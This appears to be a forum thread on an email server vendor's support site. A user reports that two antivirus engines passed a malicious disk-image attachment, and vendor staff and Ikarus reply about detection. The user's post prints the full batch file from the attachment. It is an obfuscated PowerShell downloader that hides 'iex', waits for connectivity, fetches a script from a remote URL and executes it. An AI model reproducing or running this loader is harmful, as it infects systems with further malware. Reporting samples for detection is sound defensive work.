Virus not detected by both Ikarus and Clam
-
Hi,
running latest version of Mdaemon and Antivirus plugin. Today an email with a disk image attachment (.img file) containing a batch file ( PowerShell/TrojanDownloader.Agent trojan) has been passed without blocking it. Fortunately the Eset antivirus on the clien'ts endpoint detected it.
Here the Mdaemon antivirus log:
-Mon 2024-02-19 07:43:40.120: * IKARUS AV: clean (0.020 s) doc20241902070611.img (C:\MDaemon\CFilter\TEMP\3141324088\pd82059750.att)
-Mon 2024-02-19 07:43:40.764: * ClamAV: clean (0.643 s) doc20241902070611.img (C:\MDaemon\CFilter\TEMP\3141324088\pd82059750.att)and here the batch file hidden in the attachment:
@echo off
set rt0=pAoAwAeArAsAhAeAlAlset rt0=%rt0:A=%
Set message=$rt='x','e','I';[Array]::Reverse($rt);sal z ($rt -join '');$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType
set message2=], 3072);[System.Net.ServicePointManager]::SecurityProto
set message3=col = $t56fg;$tpg='[void','] [Syst','em.Refle','ction.Asse','mbly]::LoadWi','thParti
set message4=alName(''Microsoft.VisualBasic'')';z($tpg -join '');do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);
set message5=$tty55='(New-','Obje','ct Ne','t.We','bCli','ent)';$tty=z($tty55 -join '');$tt
set message6=y;$rot='Down','load','str','ing';$rotJ=($rot -join '');$bnt='https','://antuofermo.it/G12.txt';$bng0=($bnt -join '');$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,$rotJ,[Microsoft.VisualBasic.CallType]::Method,$bng0);z($mv)start /min %rt0% %message%%message2%%message3%%message4%%message5%%message6%
-
Arron Staff
Please put the original MSG file in a password protected zip file and email it to virusfn@mdaemon.com. Please be user to include the password in your email.
-
"This malware has been classified as a virus since yesterday and is detected accordingly."
----------------------------------
IKARUS Security Software GmbH
Blechturmgasse 11, A-1050 Wien
Web: https://www.ikarussecurity.com
----------------------------------
-
Arron Staff
Thank you for letting us know!